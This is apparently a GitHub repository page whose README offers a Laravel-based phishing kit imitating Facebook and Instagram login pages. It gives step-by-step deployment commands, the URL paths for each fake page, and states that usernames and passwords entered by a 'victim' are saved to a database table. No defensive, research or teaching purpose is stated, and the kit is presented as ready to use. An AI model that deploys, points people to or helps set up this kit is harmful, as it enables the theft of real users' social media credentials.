officialzubairansari / social_logins

Facebook & Instagram Phishing Pages

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Instagram & Facebook Phishing Pages 2024 (Laravel 10)

Demo: Instagram (Screenshot) image

Demo: Facebook (Screenshot): WIP

How to use?

Just like a notmal way to delpoy laravel project on server

  1. git clone https://github.com/officialzubairansari/social_logins
  2. Create databbase
  3. Update .env with database credentials
  4. Run composer "composer install"
  5. Generate application key "php artisan generate:key"
  6. Run migration "php artisan migrateion:fresh"

Link structure?

  1. For facebook: yourdomain.com/facebook
  2. For Instagram: yourdomain.com/instagram

Where passwords will be saved?

All the username and passwords entered by victim will be store in database for seperate table.

About

Facebook & Instagram Phishing Pages


Languages

Language:PHP 93.0%Language:Blade 3.5%Language:CSS 3.1%Language:JavaScript 0.4%